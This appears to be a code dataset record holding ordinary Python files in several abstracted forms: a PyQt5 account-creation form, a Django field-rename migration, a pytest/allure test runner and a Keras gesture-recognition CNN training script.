"# -*- coding: utf-8 -*-\r\n\r\n# Form implementation generated from reading ui file 'createaccount.ui'\r\n#\r\n# Created by: PyQt5 UI code generator 5.14.1\r\n#\r\n# WARNING! All changes made in this file will be lost!\r\n\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\n\r\nclass Ui_createaccount(object):\r\n def setupUi(self, createaccount):\r\n createaccount.setObjectName(\"createaccount\")\r\n createaccount.resize(800, 600)\r\n self.centralwidget = QtWidgets.QWidget(createaccount)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\r\n self.verticalLayout.setObjectName(\"verticalLayout\")\r\n self.widget_2 = QtWidgets.QWidget(self.centralwidget)\r\n self.widget_2.setStyleSheet(\"\")\r\n self.widget_2.setObjectName(\"widget_2\")\r\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.widget_2)\r\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\r\n self.widget_3 = QtWidgets.QWidget(self.widget_2)\r\n self.widget_3.setObjectName(\"widget_3\")\r\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget_3)\r\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\r\n self.userlabel = QtWidgets.QLabel(self.widget_3)\r\n font = QtGui.QFont()\r\n font.setFamily(\"微軟正黑體\")\r\n font.setPointSize(28)\r\n self.userlabel.setFont(font)\r\n self.userlabel.setObjectName(\"userlabel\")\r\n self.horizontalLayout.addWidget(self.userlabel)\r\n self.userlineEdit = QtWidgets.QLineEdit(self.widget_3)\r\n self.userlineEdit.setMinimumSize(QtCore.QSize(300, 30))\r\n font = QtGui.QFont()\r\n font.setPointSize(16)\r\n self.userlineEdit.setFont(font)\r\n self.userlineEdit.setStyleSheet(\"border-radius:15px;\")\r\n self.userlineEdit.setText(\"\")\r\n self.userlineEdit.setObjectName(\"userlineEdit\")\r\n self.horizontalLayout.addWidget(self.userlineEdit)\r\n self.verticalLayout_2.addWidget(self.widget_3, 0, QtCore.Qt.AlignHCenter)\r\n self.widget_4 = QtWidgets.QWidget(self.widget_2)\r\n self.widget_4.setObjectName(\"widget_4\")\r\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.widget_4)\r\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\r\n self.passwordlabel = QtWidgets.QLabel(self.widget_4)\r\n font = QtGui.QFont()\r\n font.setFamily(\"微軟正黑體\")\r\n font.setPointSize(28)\r\n self.passwordlabel.setFont(font)\r\n self.passwordlabel.setObjectName(\"passwordlabel\")\r\n self.horizontalLayout_2.addWidget(self.passwordlabel)\r\n self.passwordlineEdit = QtWidgets.QLineEdit(self.widget_4)\r\n self.passwordlineEdit.setMinimumSize(QtCore.QSize(300, 30))\r\n font = QtGui.QFont()\r\n font.setPointSize(16)\r\n self.passwordlineEdit.setFont(font)\r\n self.passwordlineEdit.setStyleSheet(\"border-radius:15px;\")\r\n self.passwordlineEdit.setEchoMode(QtWidgets.QLineEdit.Password)\r\n self.passwordlineEdit.setObjectName(\"passwordlineEdit\")\r\n self.horizontalLayout_2.addWidget(self.passwordlineEdit)\r\n self.verticalLayout_2.addWidget(self.widget_4, 0, QtCore.Qt.AlignHCenter)\r\n self.widget = QtWidgets.QWidget(self.widget_2)\r\n self.widget.setObjectName(\"widget\")\r\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.widget)\r\n self.horizontalLayout_3.setContentsMargins(-1, -1, 82, -1)\r\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\r\n self.confirmpasswordlabel = QtWidgets.QLabel(self.widget)\r\n font = QtGui.QFont()\r\n font.setFamily(\"微軟正黑體\")\r\n font.setPointSize(28)\r\n self.confirmpasswordlabel.setFont(font)\r\n self.confirmpasswordlabel.setObjectName(\"confirmpasswordlabel\")\r\n 
self.horizontalLayout_3.addWidget(self.confirmpasswordlabel)\r\n self.confirmpasswordlineEdit = QtWidgets.QLineEdit(self.widget)\r\n self.confirmpasswordlineEdit.setMinimumSize(QtCore.QSize(300, 30))\r\n font = QtGui.QFont()\r\n font.setPointSize(16)\r\n self.confirmpasswordlineEdit.setFont(font)\r\n self.confirmpasswordlineEdit.setStyleSheet(\"border-radius:15px;\")\r\n self.confirmpasswordlineEdit.setEchoMode(QtWidgets.QLineEdit.Password)\r\n self.confirmpasswordlineEdit.setObjectName(\"confirmpasswordlineEdit\")\r\n self.horizontalLayout_3.addWidget(self.confirmpasswordlineEdit)\r\n self.verticalLayout_2.addWidget(self.widget, 0, QtCore.Qt.AlignHCenter)\r\n self.verticalLayout.addWidget(self.widget_2)\r\n self.widget_5 = QtWidgets.QWidget(self.centralwidget)\r\n self.widget_5.setStyleSheet(\"color:rgb(255, 255, 255)\")\r\n self.widget_5.setObjectName(\"widget_5\")\r\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.widget_5)\r\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\r\n self.confirmpushButton = QtWidgets.QPushButton(self.widget_5)\r\n self.confirmpushButton.setMinimumSize(QtCore.QSize(200, 60))\r\n font = QtGui.QFont()\r\n font.setPointSize(20)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.confirmpushButton.setFont(font)\r\n self.confirmpushButton.setStyleSheet(\"border-color: rgb(255, 255, 255);\\n\"\r\n\"background-color: rgb(255, 255, 255,100);\\n\"\r\n\"border-radius:15px;\\n\"\r\n\"font: 20pt;\")\r\n self.confirmpushButton.setObjectName(\"confirmpushButton\")\r\n self.verticalLayout_3.addWidget(self.confirmpushButton, 0, QtCore.Qt.AlignRight)\r\n self.cancelpushButton = QtWidgets.QPushButton(self.widget_5)\r\n self.cancelpushButton.setMinimumSize(QtCore.QSize(200, 60))\r\n font = QtGui.QFont()\r\n font.setPointSize(20)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.cancelpushButton.setFont(font)\r\n self.cancelpushButton.setStyleSheet(\"border-color: rgb(255, 255, 255);\\n\"\r\n\"background-color: rgb(255, 255, 255,100);\\n\"\r\n\"border-radius:15px;\\n\"\r\n\"font: 20pt;\")\r\n self.cancelpushButton.setObjectName(\"cancelpushButton\")\r\n self.verticalLayout_3.addWidget(self.cancelpushButton, 0, QtCore.Qt.AlignRight)\r\n self.verticalLayout.addWidget(self.widget_5)\r\n createaccount.setCentralWidget(self.centralwidget)\r\n self.menubar = QtWidgets.QMenuBar(createaccount)\r\n self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))\r\n self.menubar.setObjectName(\"menubar\")\r\n createaccount.setMenuBar(self.menubar)\r\n self.statusbar = QtWidgets.QStatusBar(createaccount)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n createaccount.setStatusBar(self.statusbar)\r\n\r\n self.retranslateUi(createaccount)\r\n QtCore.QMetaObject.connectSlotsByName(createaccount)\r\n\r\n def retranslateUi(self, createaccount):\r\n _translate = QtCore.QCoreApplication.translate\r\n createaccount.setWindowTitle(_translate(\"createaccount\", \"MainWindow\"))\r\n self.userlabel.setText(_translate(\"createaccount\", \"<html><head/><body><p><span style=\\\" color:#ffffff;\\\">帳號:</span></p></body></html>\"))\r\n self.passwordlabel.setText(_translate(\"createaccount\", \"<html><head/><body><p><span style=\\\" color:#ffffff;\\\">密碼:</span></p></body></html>\"))\r\n self.confirmpasswordlabel.setText(_translate(\"createaccount\", \"<html><head/><body><p><span style=\\\" color:#ffffff;\\\">確認密碼:</span></p></body></html>\"))\r\n self.confirmpushButton.setText(_translate(\"createaccount\", \"確認\"))\r\n 
self.cancelpushButton.setText(_translate(\"createaccount\", \"取消\"))\r\n",
"from PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_createaccount(object):\n\n def setupUi(self, createaccount):\n createaccount.setObjectName('createaccount')\n createaccount.resize(800, 600)\n self.centralwidget = QtWidgets.QWidget(createaccount)\n self.centralwidget.setObjectName('centralwidget')\n self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n self.verticalLayout.setObjectName('verticalLayout')\n self.widget_2 = QtWidgets.QWidget(self.centralwidget)\n self.widget_2.setStyleSheet('')\n self.widget_2.setObjectName('widget_2')\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.widget_2)\n self.verticalLayout_2.setObjectName('verticalLayout_2')\n self.widget_3 = QtWidgets.QWidget(self.widget_2)\n self.widget_3.setObjectName('widget_3')\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget_3)\n self.horizontalLayout.setObjectName('horizontalLayout')\n self.userlabel = QtWidgets.QLabel(self.widget_3)\n font = QtGui.QFont()\n font.setFamily('微軟正黑體')\n font.setPointSize(28)\n self.userlabel.setFont(font)\n self.userlabel.setObjectName('userlabel')\n self.horizontalLayout.addWidget(self.userlabel)\n self.userlineEdit = QtWidgets.QLineEdit(self.widget_3)\n self.userlineEdit.setMinimumSize(QtCore.QSize(300, 30))\n font = QtGui.QFont()\n font.setPointSize(16)\n self.userlineEdit.setFont(font)\n self.userlineEdit.setStyleSheet('border-radius:15px;')\n self.userlineEdit.setText('')\n self.userlineEdit.setObjectName('userlineEdit')\n self.horizontalLayout.addWidget(self.userlineEdit)\n self.verticalLayout_2.addWidget(self.widget_3, 0, QtCore.Qt.\n AlignHCenter)\n self.widget_4 = QtWidgets.QWidget(self.widget_2)\n self.widget_4.setObjectName('widget_4')\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.widget_4)\n self.horizontalLayout_2.setObjectName('horizontalLayout_2')\n self.passwordlabel = QtWidgets.QLabel(self.widget_4)\n font = QtGui.QFont()\n font.setFamily('微軟正黑體')\n font.setPointSize(28)\n self.passwordlabel.setFont(font)\n self.passwordlabel.setObjectName('passwordlabel')\n self.horizontalLayout_2.addWidget(self.passwordlabel)\n self.passwordlineEdit = QtWidgets.QLineEdit(self.widget_4)\n self.passwordlineEdit.setMinimumSize(QtCore.QSize(300, 30))\n font = QtGui.QFont()\n font.setPointSize(16)\n self.passwordlineEdit.setFont(font)\n self.passwordlineEdit.setStyleSheet('border-radius:15px;')\n self.passwordlineEdit.setEchoMode(QtWidgets.QLineEdit.Password)\n self.passwordlineEdit.setObjectName('passwordlineEdit')\n self.horizontalLayout_2.addWidget(self.passwordlineEdit)\n self.verticalLayout_2.addWidget(self.widget_4, 0, QtCore.Qt.\n AlignHCenter)\n self.widget = QtWidgets.QWidget(self.widget_2)\n self.widget.setObjectName('widget')\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.widget)\n self.horizontalLayout_3.setContentsMargins(-1, -1, 82, -1)\n self.horizontalLayout_3.setObjectName('horizontalLayout_3')\n self.confirmpasswordlabel = QtWidgets.QLabel(self.widget)\n font = QtGui.QFont()\n font.setFamily('微軟正黑體')\n font.setPointSize(28)\n self.confirmpasswordlabel.setFont(font)\n self.confirmpasswordlabel.setObjectName('confirmpasswordlabel')\n self.horizontalLayout_3.addWidget(self.confirmpasswordlabel)\n self.confirmpasswordlineEdit = QtWidgets.QLineEdit(self.widget)\n self.confirmpasswordlineEdit.setMinimumSize(QtCore.QSize(300, 30))\n font = QtGui.QFont()\n font.setPointSize(16)\n self.confirmpasswordlineEdit.setFont(font)\n self.confirmpasswordlineEdit.setStyleSheet('border-radius:15px;')\n 
self.confirmpasswordlineEdit.setEchoMode(QtWidgets.QLineEdit.Password)\n self.confirmpasswordlineEdit.setObjectName('confirmpasswordlineEdit')\n self.horizontalLayout_3.addWidget(self.confirmpasswordlineEdit)\n self.verticalLayout_2.addWidget(self.widget, 0, QtCore.Qt.AlignHCenter)\n self.verticalLayout.addWidget(self.widget_2)\n self.widget_5 = QtWidgets.QWidget(self.centralwidget)\n self.widget_5.setStyleSheet('color:rgb(255, 255, 255)')\n self.widget_5.setObjectName('widget_5')\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.widget_5)\n self.verticalLayout_3.setObjectName('verticalLayout_3')\n self.confirmpushButton = QtWidgets.QPushButton(self.widget_5)\n self.confirmpushButton.setMinimumSize(QtCore.QSize(200, 60))\n font = QtGui.QFont()\n font.setPointSize(20)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(50)\n self.confirmpushButton.setFont(font)\n self.confirmpushButton.setStyleSheet(\n \"\"\"border-color: rgb(255, 255, 255);\nbackground-color: rgb(255, 255, 255,100);\nborder-radius:15px;\nfont: 20pt;\"\"\"\n )\n self.confirmpushButton.setObjectName('confirmpushButton')\n self.verticalLayout_3.addWidget(self.confirmpushButton, 0, QtCore.\n Qt.AlignRight)\n self.cancelpushButton = QtWidgets.QPushButton(self.widget_5)\n self.cancelpushButton.setMinimumSize(QtCore.QSize(200, 60))\n font = QtGui.QFont()\n font.setPointSize(20)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(50)\n self.cancelpushButton.setFont(font)\n self.cancelpushButton.setStyleSheet(\n \"\"\"border-color: rgb(255, 255, 255);\nbackground-color: rgb(255, 255, 255,100);\nborder-radius:15px;\nfont: 20pt;\"\"\"\n )\n self.cancelpushButton.setObjectName('cancelpushButton')\n self.verticalLayout_3.addWidget(self.cancelpushButton, 0, QtCore.Qt\n .AlignRight)\n self.verticalLayout.addWidget(self.widget_5)\n createaccount.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(createaccount)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))\n self.menubar.setObjectName('menubar')\n createaccount.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(createaccount)\n self.statusbar.setObjectName('statusbar')\n createaccount.setStatusBar(self.statusbar)\n self.retranslateUi(createaccount)\n QtCore.QMetaObject.connectSlotsByName(createaccount)\n\n def retranslateUi(self, createaccount):\n _translate = QtCore.QCoreApplication.translate\n createaccount.setWindowTitle(_translate('createaccount', 'MainWindow'))\n self.userlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">帳號:</span></p></body></html>'\n ))\n self.passwordlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">密碼:</span></p></body></html>'\n ))\n self.confirmpasswordlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">確認密碼:</span></p></body></html>'\n ))\n self.confirmpushButton.setText(_translate('createaccount', '確認'))\n self.cancelpushButton.setText(_translate('createaccount', '取消'))\n",
"<import token>\n\n\nclass Ui_createaccount(object):\n\n def setupUi(self, createaccount):\n createaccount.setObjectName('createaccount')\n createaccount.resize(800, 600)\n self.centralwidget = QtWidgets.QWidget(createaccount)\n self.centralwidget.setObjectName('centralwidget')\n self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n self.verticalLayout.setObjectName('verticalLayout')\n self.widget_2 = QtWidgets.QWidget(self.centralwidget)\n self.widget_2.setStyleSheet('')\n self.widget_2.setObjectName('widget_2')\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.widget_2)\n self.verticalLayout_2.setObjectName('verticalLayout_2')\n self.widget_3 = QtWidgets.QWidget(self.widget_2)\n self.widget_3.setObjectName('widget_3')\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget_3)\n self.horizontalLayout.setObjectName('horizontalLayout')\n self.userlabel = QtWidgets.QLabel(self.widget_3)\n font = QtGui.QFont()\n font.setFamily('微軟正黑體')\n font.setPointSize(28)\n self.userlabel.setFont(font)\n self.userlabel.setObjectName('userlabel')\n self.horizontalLayout.addWidget(self.userlabel)\n self.userlineEdit = QtWidgets.QLineEdit(self.widget_3)\n self.userlineEdit.setMinimumSize(QtCore.QSize(300, 30))\n font = QtGui.QFont()\n font.setPointSize(16)\n self.userlineEdit.setFont(font)\n self.userlineEdit.setStyleSheet('border-radius:15px;')\n self.userlineEdit.setText('')\n self.userlineEdit.setObjectName('userlineEdit')\n self.horizontalLayout.addWidget(self.userlineEdit)\n self.verticalLayout_2.addWidget(self.widget_3, 0, QtCore.Qt.\n AlignHCenter)\n self.widget_4 = QtWidgets.QWidget(self.widget_2)\n self.widget_4.setObjectName('widget_4')\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.widget_4)\n self.horizontalLayout_2.setObjectName('horizontalLayout_2')\n self.passwordlabel = QtWidgets.QLabel(self.widget_4)\n font = QtGui.QFont()\n font.setFamily('微軟正黑體')\n font.setPointSize(28)\n self.passwordlabel.setFont(font)\n self.passwordlabel.setObjectName('passwordlabel')\n self.horizontalLayout_2.addWidget(self.passwordlabel)\n self.passwordlineEdit = QtWidgets.QLineEdit(self.widget_4)\n self.passwordlineEdit.setMinimumSize(QtCore.QSize(300, 30))\n font = QtGui.QFont()\n font.setPointSize(16)\n self.passwordlineEdit.setFont(font)\n self.passwordlineEdit.setStyleSheet('border-radius:15px;')\n self.passwordlineEdit.setEchoMode(QtWidgets.QLineEdit.Password)\n self.passwordlineEdit.setObjectName('passwordlineEdit')\n self.horizontalLayout_2.addWidget(self.passwordlineEdit)\n self.verticalLayout_2.addWidget(self.widget_4, 0, QtCore.Qt.\n AlignHCenter)\n self.widget = QtWidgets.QWidget(self.widget_2)\n self.widget.setObjectName('widget')\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.widget)\n self.horizontalLayout_3.setContentsMargins(-1, -1, 82, -1)\n self.horizontalLayout_3.setObjectName('horizontalLayout_3')\n self.confirmpasswordlabel = QtWidgets.QLabel(self.widget)\n font = QtGui.QFont()\n font.setFamily('微軟正黑體')\n font.setPointSize(28)\n self.confirmpasswordlabel.setFont(font)\n self.confirmpasswordlabel.setObjectName('confirmpasswordlabel')\n self.horizontalLayout_3.addWidget(self.confirmpasswordlabel)\n self.confirmpasswordlineEdit = QtWidgets.QLineEdit(self.widget)\n self.confirmpasswordlineEdit.setMinimumSize(QtCore.QSize(300, 30))\n font = QtGui.QFont()\n font.setPointSize(16)\n self.confirmpasswordlineEdit.setFont(font)\n self.confirmpasswordlineEdit.setStyleSheet('border-radius:15px;')\n self.confirmpasswordlineEdit.setEchoMode(QtWidgets.QLineEdit.Password)\n 
self.confirmpasswordlineEdit.setObjectName('confirmpasswordlineEdit')\n self.horizontalLayout_3.addWidget(self.confirmpasswordlineEdit)\n self.verticalLayout_2.addWidget(self.widget, 0, QtCore.Qt.AlignHCenter)\n self.verticalLayout.addWidget(self.widget_2)\n self.widget_5 = QtWidgets.QWidget(self.centralwidget)\n self.widget_5.setStyleSheet('color:rgb(255, 255, 255)')\n self.widget_5.setObjectName('widget_5')\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.widget_5)\n self.verticalLayout_3.setObjectName('verticalLayout_3')\n self.confirmpushButton = QtWidgets.QPushButton(self.widget_5)\n self.confirmpushButton.setMinimumSize(QtCore.QSize(200, 60))\n font = QtGui.QFont()\n font.setPointSize(20)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(50)\n self.confirmpushButton.setFont(font)\n self.confirmpushButton.setStyleSheet(\n \"\"\"border-color: rgb(255, 255, 255);\nbackground-color: rgb(255, 255, 255,100);\nborder-radius:15px;\nfont: 20pt;\"\"\"\n )\n self.confirmpushButton.setObjectName('confirmpushButton')\n self.verticalLayout_3.addWidget(self.confirmpushButton, 0, QtCore.\n Qt.AlignRight)\n self.cancelpushButton = QtWidgets.QPushButton(self.widget_5)\n self.cancelpushButton.setMinimumSize(QtCore.QSize(200, 60))\n font = QtGui.QFont()\n font.setPointSize(20)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(50)\n self.cancelpushButton.setFont(font)\n self.cancelpushButton.setStyleSheet(\n \"\"\"border-color: rgb(255, 255, 255);\nbackground-color: rgb(255, 255, 255,100);\nborder-radius:15px;\nfont: 20pt;\"\"\"\n )\n self.cancelpushButton.setObjectName('cancelpushButton')\n self.verticalLayout_3.addWidget(self.cancelpushButton, 0, QtCore.Qt\n .AlignRight)\n self.verticalLayout.addWidget(self.widget_5)\n createaccount.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(createaccount)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))\n self.menubar.setObjectName('menubar')\n createaccount.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(createaccount)\n self.statusbar.setObjectName('statusbar')\n createaccount.setStatusBar(self.statusbar)\n self.retranslateUi(createaccount)\n QtCore.QMetaObject.connectSlotsByName(createaccount)\n\n def retranslateUi(self, createaccount):\n _translate = QtCore.QCoreApplication.translate\n createaccount.setWindowTitle(_translate('createaccount', 'MainWindow'))\n self.userlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">帳號:</span></p></body></html>'\n ))\n self.passwordlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">密碼:</span></p></body></html>'\n ))\n self.confirmpasswordlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">確認密碼:</span></p></body></html>'\n ))\n self.confirmpushButton.setText(_translate('createaccount', '確認'))\n self.cancelpushButton.setText(_translate('createaccount', '取消'))\n",
"<import token>\n\n\nclass Ui_createaccount(object):\n <function token>\n\n def retranslateUi(self, createaccount):\n _translate = QtCore.QCoreApplication.translate\n createaccount.setWindowTitle(_translate('createaccount', 'MainWindow'))\n self.userlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">帳號:</span></p></body></html>'\n ))\n self.passwordlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">密碼:</span></p></body></html>'\n ))\n self.confirmpasswordlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">確認密碼:</span></p></body></html>'\n ))\n self.confirmpushButton.setText(_translate('createaccount', '確認'))\n self.cancelpushButton.setText(_translate('createaccount', '取消'))\n",
"<import token>\n\n\nclass Ui_createaccount(object):\n <function token>\n <function token>\n",
"<import token>\n<class token>\n"
] | false |
99,839 | f522aa91a06970bc4361d8ad01f8c33852d948ce | # Generated by Django 2.0.5 on 2020-01-21 08:23
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('doctor', '0344_searchscoreparams'),
]
operations = [
migrations.RenameField(
model_name='searchscoreparams',
old_name='value',
new_name='max_score',
),
]
| [
"# Generated by Django 2.0.5 on 2020-01-21 08:23\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('doctor', '0344_searchscoreparams'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='searchscoreparams',\n old_name='value',\n new_name='max_score',\n ),\n ]\n",
"from django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('doctor', '0344_searchscoreparams')]\n operations = [migrations.RenameField(model_name='searchscoreparams',\n old_name='value', new_name='max_score')]\n",
"<import token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('doctor', '0344_searchscoreparams')]\n operations = [migrations.RenameField(model_name='searchscoreparams',\n old_name='value', new_name='max_score')]\n",
"<import token>\n\n\nclass Migration(migrations.Migration):\n <assignment token>\n <assignment token>\n",
"<import token>\n<class token>\n"
] | false |
99,840 | 029ea533bd746c0933d4b0a594ec538e1b965de0 | import pytest
import os
import sys
from ks_login import load_log
log = load_log.Log()
class TbpRunner(object):
def run(self, path=None, run_args=None, case_mark=None):
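        # assemble the pytest CLI arguments: -s, an optional -m marker filter, the comma-separated test paths, and an allure results directory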
if path:
work_runner = []
path_list = path.split(",")
work_runner.append("-s")
if case_mark:
work_runner.append("-m=%s" % case_mark)
for i in path_list:
work_runner.append(i)
work_runner.append("--alluredir")
work_runner.append("report")
print(work_runner)
pytest.main(work_runner)
else:
pytest.main(["-s",
"pytest_test/options",
"--alluredir", "report"])
if __name__ == "__main__":
try:
work_path = sys.argv[1]
except Exception as e:
log.error(e.args)
work_path = None
print(work_path)
run = TbpRunner()
run.run(path=work_path)
# pytest.main(["--clean-alluredir", "-s", "pytest_test/options/test_file.py", "--alluredir", 'report'])
| [
"import pytest\nimport os\nimport sys\nfrom ks_login import load_log\nlog = load_log.Log()\n\n\nclass TbpRunner(object):\n\n\n def run(self, path=None, run_args=None, case_mark=None):\n if path:\n work_runner = []\n path_list = path.split(\",\")\n work_runner.append(\"-s\")\n if case_mark:\n work_runner.append(\"-m=%s\" % case_mark)\n for i in path_list:\n work_runner.append(i)\n work_runner.append(\"--alluredir\")\n work_runner.append(\"report\")\n print(work_runner)\n pytest.main(work_runner)\n else:\n pytest.main([\"-s\",\n \"pytest_test/options\",\n \"--alluredir\", \"report\"])\n\n\n\n\n\nif __name__ == \"__main__\":\n try:\n work_path = sys.argv[1]\n except Exception as e:\n log.error(e.args)\n work_path = None\n\n print(work_path)\n\n run = TbpRunner()\n run.run(path=work_path)\n\n\n # pytest.main([\"--clean-alluredir\", \"-s\", \"pytest_test/options/test_file.py\", \"--alluredir\", 'report'])\n\n",
"import pytest\nimport os\nimport sys\nfrom ks_login import load_log\nlog = load_log.Log()\n\n\nclass TbpRunner(object):\n\n def run(self, path=None, run_args=None, case_mark=None):\n if path:\n work_runner = []\n path_list = path.split(',')\n work_runner.append('-s')\n if case_mark:\n work_runner.append('-m=%s' % case_mark)\n for i in path_list:\n work_runner.append(i)\n work_runner.append('--alluredir')\n work_runner.append('report')\n print(work_runner)\n pytest.main(work_runner)\n else:\n pytest.main(['-s', 'pytest_test/options', '--alluredir', 'report'])\n\n\nif __name__ == '__main__':\n try:\n work_path = sys.argv[1]\n except Exception as e:\n log.error(e.args)\n work_path = None\n print(work_path)\n run = TbpRunner()\n run.run(path=work_path)\n",
"<import token>\nlog = load_log.Log()\n\n\nclass TbpRunner(object):\n\n def run(self, path=None, run_args=None, case_mark=None):\n if path:\n work_runner = []\n path_list = path.split(',')\n work_runner.append('-s')\n if case_mark:\n work_runner.append('-m=%s' % case_mark)\n for i in path_list:\n work_runner.append(i)\n work_runner.append('--alluredir')\n work_runner.append('report')\n print(work_runner)\n pytest.main(work_runner)\n else:\n pytest.main(['-s', 'pytest_test/options', '--alluredir', 'report'])\n\n\nif __name__ == '__main__':\n try:\n work_path = sys.argv[1]\n except Exception as e:\n log.error(e.args)\n work_path = None\n print(work_path)\n run = TbpRunner()\n run.run(path=work_path)\n",
"<import token>\n<assignment token>\n\n\nclass TbpRunner(object):\n\n def run(self, path=None, run_args=None, case_mark=None):\n if path:\n work_runner = []\n path_list = path.split(',')\n work_runner.append('-s')\n if case_mark:\n work_runner.append('-m=%s' % case_mark)\n for i in path_list:\n work_runner.append(i)\n work_runner.append('--alluredir')\n work_runner.append('report')\n print(work_runner)\n pytest.main(work_runner)\n else:\n pytest.main(['-s', 'pytest_test/options', '--alluredir', 'report'])\n\n\nif __name__ == '__main__':\n try:\n work_path = sys.argv[1]\n except Exception as e:\n log.error(e.args)\n work_path = None\n print(work_path)\n run = TbpRunner()\n run.run(path=work_path)\n",
"<import token>\n<assignment token>\n\n\nclass TbpRunner(object):\n\n def run(self, path=None, run_args=None, case_mark=None):\n if path:\n work_runner = []\n path_list = path.split(',')\n work_runner.append('-s')\n if case_mark:\n work_runner.append('-m=%s' % case_mark)\n for i in path_list:\n work_runner.append(i)\n work_runner.append('--alluredir')\n work_runner.append('report')\n print(work_runner)\n pytest.main(work_runner)\n else:\n pytest.main(['-s', 'pytest_test/options', '--alluredir', 'report'])\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\nclass TbpRunner(object):\n <function token>\n\n\n<code token>\n",
"<import token>\n<assignment token>\n<class token>\n<code token>\n"
] | false |
99,841 | a09cc97f4d2c090b3a347a3edbd2d6bb25f3ef9a | ### Gesture Detection using CNN
import os
import tensorflow as tf
import tensorflow.keras as keras
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.preprocessing import image
from tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout
num_classes = 3 # number of gestures
target_size = (96,96)
# Dataset
#train_dir = 'data/gesture'
train_dir = 'data/game'
# Data Generator
rescale = 1./255
train_datagen = ImageDataGenerator(
rescale=rescale,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
train_generator = train_datagen.flow_from_directory(
train_dir,
target_size=target_size,
class_mode='categorical',
batch_size=8,
color_mode="rgb",
shuffle=True)
# Build Model
model = keras.models.Sequential()
# block 1
model.add(Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu', input_shape=(96,96,3)))
model.add(MaxPooling2D(pool_size=(2, 2)))
# block 2
model.add(Conv2D(64, kernel_size=(3, 3), padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# block 3
model.add(Conv2D(96, kernel_size=(3, 3), padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# block 4
model.add(Conv2D(128, kernel_size=(3, 3), padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# fully-connected layers
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes , activation='softmax'))
# Compile Model
model.compile(optimizer='Adam',loss='categorical_crossentropy',metrics=['accuracy'])
model.summary()
# Train Model
num_epochs=100
model.fit_generator(generator=train_generator,
steps_per_epoch=train_generator.n // train_generator.batch_size,
epochs=num_epochs)
# Save Model
model.save('model/gesture_cnn.h5')
| [
